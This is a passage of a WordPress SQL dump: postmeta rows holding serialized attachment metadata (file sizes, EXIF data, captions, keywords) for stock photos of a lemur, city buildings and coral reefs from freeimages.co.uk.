peg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"black_and_white_lemur-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"black_and_white_lemur-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"black_and_white_lemur-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:34:\"black_and_white_lemur-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:33:\"black_and_white_lemur-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:33:\"black_and_white_lemur-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:33:\"black_and_white_lemur-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:32:\"black_and_white_lemur-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:81:\"Black and white lemur climbing a tree looking away from the camera with copyspace\";s:17:\"created_timestamp\";s:10:\"1322089398\";s:9:\"copyright\";s:48:\"www.freeimages.co.uk - see site for terms of use\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:21:\"Black and white lemur\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:8:\"wildlife\";i:1;s:6:\"animal\";i:2;s:9:\"captivity\";i:3;s:12:\"conservation\";i:4;s:5:\"white\";i:5;s:5:\"black\";i:6;s:8:\"arboreal\";i:7;s:5:\"lemur\";i:8;s:7:\"primate\";i:9;s:9:\"prosimian\";i:10;s:4:\"tree\";i:11;s:8:\"climbing\";i:12;s:10:\"madagascan\";i:13;s:5:\"fauna\";i:14;s:8:\"markings\";}}}'),(321,129,'_wp_attached_file','2017/10/building00029p.jpg'),(322,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1218;s:4:\"file\";s:26:\"2017/10/building00029p.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"building00029p-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"building00029p-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"building00029p-768x457.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"building00029p-1024x609.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:27:\"building00029p-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:26:\"building00029p-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:26:\"building00029p-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:26:\"building00029p-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:25:\"building00029p-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"www.freeimages.co.uk attribution\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:43:\"a generic looking urban skyline aerial view\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:54:\"www.freeimages.co.uk attribution required for free use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:13:\"urban skyline\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:11:{i:0;s:4:\"city\";i:1;s:8:\"downtown\";i:2;s:12:\"neighborhood\";i:3;s:7:\"skyline\";i:4;s:6:\"sprawl\";i:5;s:7:\"suburbs\";i:6;s:5:\"urban\";i:7;s:3:\"day\";i:8;s:8:\"overview\";i:9;s:6:\"houses\";i:10;s:4:\"view\";}}}'),(323,130,'_wp_attached_file','2017/10/building00030p.jpg'),(324,130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1256;s:6:\"height\";i:630;s:4:\"file\";s:26:\"2017/10/building00030p.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"building00030p-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"building00030p-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"building00030p-768x385.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"building00030p-1024x514.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:27:\"building00030p-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:26:\"building00030p-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:26:\"building00030p-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:26:\"building00030p-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:25:\"building00030p-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"freeimages.co.uk buildings\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(325,131,'_wp_attached_file','2017/10/building00033p.jpg'),(326,131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1281;s:4:\"file\";s:26:\"2017/10/building00033p.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"building00033p-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"building00033p-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"building00033p-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"building00033p-1024x641.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:27:\"building00033p-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:26:\"building00033p-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:26:\"building00033p-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:26:\"building00033p-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:25:\"building00033p-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"www.freeimages.co.uk attribution\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:51:\"looking down on the monteal olympic pool / bio dome\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:54:\"www.freeimages.co.uk attribution required for free use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:12:\"olympic pool\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:12:{i:0;s:8:\"abstract\";i:1;s:6:\"canada\";i:2;s:4:\"dome\";i:3;s:6:\"modern\";i:4;s:8:\"montreal\";i:5;s:7:\"olympic\";i:6;s:7:\"stadium\";i:7;s:13:\"swimming pool\";i:8;s:5:\"venue\";i:9;s:8:\"olympics\";i:10;s:14:\"squatic centre\";i:11;s:8:\"bio dome\";}}}'),(327,132,'_wp_attached_file','2017/10/building00034p.jpg'),(328,132,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1214;s:4:\"file\";s:26:\"2017/10/building00034p.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"building00034p-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"building00034p-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"building00034p-768x455.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"building00034p-1024x607.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:607;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:27:\"building00034p-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:26:\"building00034p-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:26:\"building00034p-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:26:\"building00034p-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:25:\"building00034p-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"www.freeimages.co.uk attribution\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:53:\"an old photo of the tall buildings of central toronto\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:54:\"www.freeimages.co.uk attribution required for free use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:15:\"toronto skyline\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:6:\"canada\";i:1;s:8:\"cn tower\";i:2;s:8:\"downtown\";i:3;s:7:\"toronto\";i:4;s:14:\"low angle view\";i:5;s:7:\"skyline\";i:6;s:9:\"tree tops\";i:7;s:9:\"buildings\";i:8;s:11:\"skyscrapers\";i:9;s:4:\"city\";i:10;s:5:\"urban\";i:11;s:12:\"architecture\";i:12;s:3:\"old\";i:13;s:10:\"historical\";i:14;s:7:\"central\";}}}'),(329,133,'_wp_attached_file','2017/10/buildings04090071.jpg'),(330,133,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1534;s:4:\"file\";s:29:\"2017/10/buildings04090071.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"buildings04090071-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"buildings04090071-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"buildings04090071-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"buildings04090071-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:30:\"buildings04090071-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:29:\"buildings04090071-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:29:\"buildings04090071-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:29:\"buildings04090071-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:28:\"buildings04090071-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"www.freeimages.co.uk attribution\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:59:\"a block of flats overlooking the river trent, nottingham uk\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:54:\"www.freeimages.co.uk attribution required for free use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:14:\"block of flats\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:10:\"apartments\";i:1;s:12:\"architecture\";i:2;s:5:\"block\";i:3;s:8:\"building\";i:4;s:7:\"england\";i:5;s:5:\"flats\";i:6;s:7:\"housing\";i:7;s:6:\"modern\";i:8;s:10:\"nottingham\";i:9;s:10:\"residences\";i:10;s:11:\"residential\";i:11;s:5:\"river\";i:12;s:5:\"trent\";i:13;s:5:\"urban\";i:14;s:11:\"overlooking\";}}}'),(331,134,'_wp_attached_file','2017/10/buildingsconstruction0871.jpg'),(332,134,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:37:\"2017/10/buildingsconstruction0871.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"buildingsconstruction0871-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"buildingsconstruction0871-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"buildingsconstruction0871-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"buildingsconstruction0871-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:38:\"buildingsconstruction0871-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:37:\"buildingsconstruction0871-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:37:\"buildingsconstruction0871-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:37:\"buildingsconstruction0871-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:36:\"buildingsconstruction0871-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"www.freeimages.co.uk attribution\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:30:\"modern nottingham architecture\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:54:\"www.freeimages.co.uk attribution required for free use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:20:\"nottingham playhouse\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:8:\"building\";i:1;s:12:\"construction\";i:2;s:5:\"crane\";i:3;s:8:\"exterior\";i:4;s:6:\"facade\";i:5;s:5:\"glass\";i:6;s:6:\"modern\";i:7;s:10:\"nottingham\";i:8;s:9:\"playhouse\";i:9;s:9:\"reflected\";i:10;s:7:\"windows\";i:11;s:7:\"theater\";i:12;s:10:\"theatrical\";i:13;s:5:\"venue\";i:14;s:10:\"reflection\";}}}'),(333,135,'_wp_attached_file','2017/10/coral_and_reef_fish_2739.jpg'),(334,135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1875;s:4:\"file\";s:36:\"2017/10/coral_and_reef_fish_2739.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"coral_and_reef_fish_2739-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"coral_and_reef_fish_2739-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"coral_and_reef_fish_2739-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"coral_and_reef_fish_2739-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:37:\"coral_and_reef_fish_2739-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:36:\"coral_and_reef_fish_2739-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:36:\"coral_and_reef_fish_2739-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:36:\"coral_and_reef_fish_2739-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:35:\"coral_and_reef_fish_2739-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:18:\"Canon PowerShot G7\";s:7:\"caption\";s:53:\"colourful pink finger coral and a shoals of reef fish\";s:17:\"created_timestamp\";s:10:\"1244735550\";s:9:\"copyright\";s:75:\"www.freeimages.co.uk attribution required for free use see site for details\";s:12:\"focal_length\";s:3:\"7.4\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:17:\"Pink Finger Coral\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:13:{i:0;s:4:\"fish\";i:1;s:6:\"marine\";i:2;s:4:\"swim\";i:3;s:10:\"underwater\";i:4;s:10:\"coral reef\";i:5;s:18:\"great barrier reef\";i:6;s:9:\"australia\";i:7;s:3:\"sea\";i:8;s:5:\"ocean\";i:9;s:7:\"pacific\";i:10;s:4:\"fish\";i:11;s:6:\"corals\";i:12;s:5:\"coral\";}}}'),(335,136,'_wp_attached_file','2017/10/coral_barrier_reef_2712.jpg'),(336,136,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1875;s:4:\"file\";s:35:\"2017/10/coral_barrier_reef_2712.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"coral_barrier_reef_2712-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"coral_barrier_reef_2712-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"coral_barrier_reef_2712-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"coral_barrier_reef_2712-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:36:\"coral_barrier_reef_2712-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:35:\"coral_barrier_reef_2712-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:35:\"coral_barrier_reef_2712-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:35:\"coral_barrier_reef_2712-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:34:\"coral_barrier_reef_2712-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:18:\"Canon PowerShot G7\";s:7:\"caption\";s:37:\"an assortment of corals and reef fish\";s:17:\"created_timestamp\";s:10:\"1244733664\";s:9:\"copyright\";s:75:\"www.freeimages.co.uk attribution required for free use see site for details\";s:12:\"focal_length\";s:3:\"7.4\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:9:\"Reef Fish\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:8:\"swimming\";i:1;s:5:\"water\";i:2;s:5:\"coral\";i:3;s:6:\"corals\";i:4;s:4:\"swim\";i:5;s:15:\"underwater reef\";i:6;s:4:\"fish\";i:7;s:12:\"barrier reef\";i:8;s:9:\"australia\";i:9;s:10:\"queensland\";}}}'),(337,137,'_wp_attached_file','2017/10/coral_ecosystem_2763.jpg'),(338,137,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1875;s:6:\"height\";i:2500;s:4:\"file\";s:32:\"2017/10/coral_ecosystem_2763.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"coral_ecosystem_2763-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"coral_ecosystem_2763-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"coral_ecosystem_2763-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"coral_ecosystem_2763-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:33:\"coral_ecosystem_2763-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:32:\"coral_ecosystem_2763-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:32:\"coral_ecosystem_2763-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:32:\"coral_ecosystem_2763-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:31:\"coral_ecosystem_2763-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:18:\"Canon PowerShot 